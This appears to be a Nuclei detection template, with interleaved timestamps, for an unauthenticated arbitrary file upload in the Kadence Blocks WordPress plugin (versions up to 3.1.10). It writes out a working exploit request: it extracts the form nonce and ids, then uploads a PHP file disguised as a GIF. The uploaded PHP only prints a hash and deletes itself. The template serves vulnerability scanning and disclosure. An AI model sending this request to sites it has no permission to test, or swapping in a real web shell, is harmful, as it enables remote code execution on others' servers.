2023-10-20 12:47:13 +00:00
id : wp-kadence-blocks-rce
info :
2023-10-20 14:57:14 +00:00
name : WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload
2023-10-20 12:47:13 +00:00
author : theamanrawat
severity : critical
description : |
The Kadence Blocks for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the process_fields function in versions up to, and including, 3.1.10. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
2023-10-20 17:04:38 +00:00
remediation : Fixed in 3.1.11
2023-10-20 12:47:13 +00:00
reference :
- https://wordpress.org/plugins/kadence-blocks/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks/kadence-blocks-3110-unauthenticated-arbitrary-file-upload
metadata :
2023-10-20 14:57:14 +00:00
verified : true
2023-10-20 17:04:38 +00:00
max-request : 2
publicwww-query : "/wp-content/plugins/kadence-blocks/"
2024-04-15 11:26:37 +00:00
tags : rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,fileupload,intrusive
2023-10-20 17:04:38 +00:00
variables :
str : "{{to_lower(rand_text_alpha(5))}}"
email : "{{rand_base(8)}}@{{rand_base(5)}}.com"
filename : "{{to_lower(rand_text_alpha(5))}}"
2024-04-15 11:26:37 +00:00
string : "wp-kadence-blocks-rce"
2023-10-20 12:47:13 +00:00
http :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------8779924633391890046425977712
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="fieldfb0b94-aa"
2023-10-20 17:04:38 +00:00
{{str}}
2023-10-20 12:47:13 +00:00
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="fieldec6f26-c7"
2023-10-20 17:04:38 +00:00
{{email}}
2023-10-20 12:47:13 +00:00
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="fieldc9b894-4c"
2023-10-20 17:04:38 +00:00
{{str}}
2023-10-20 12:47:13 +00:00
-----------------------------8779924633391890046425977712
2023-10-20 17:04:38 +00:00
Content-Disposition : form-data; name="field983473-0a"; filename="{{filename}}.php"
2023-10-20 12:47:13 +00:00
Content-Type : application/x-php
GIF89a
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
2023-10-20 12:47:13 +00:00
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="_kb_adv_form_post_id"
{{post_id}}
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="action"
kb_process_advanced_form_submit
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="_kb_adv_form_id"
{{form_id}}
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="_kb_form_verify"
{{nonce}}
-----------------------------8779924633391890046425977712 --
matchers :
2023-10-20 14:57:14 +00:00
- type : dsl
dsl :
- 'status_code_2 == 200'
- 'contains(header_2, "application/json")'
- 'contains_all(body_2, "Submission Success, Thanks for getting in touch!", "success\":true")'
2023-10-20 12:47:13 +00:00
condition : and
extractors :
- type : regex
name : nonce
part : body_1
group : 1
regex :
- 'kb_adv_form_params\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
internal : true
- type : regex
name : form_id
part : body_1
group : 1
regex :
- 'name="_kb_adv_form_id" value="([^"]*)"'
internal : true
- type : regex
name : post_id
part : body_1
group : 1
regex :
- 'name="_kb_adv_form_post_id" value="([^"]*)"'
internal : true
2024-04-23 10:06:08 +00:00
# digest: 4a0a00473045022100cc639e54b6829ae76f13be02b1374c4bec11a3985079f91080fd1e3ebdd2d51a022034a74ff46b948364481cd14136b168e599c1d779abb902c95ea44ccba33d6f6d:922c64590222798bb761d5b6d8e72950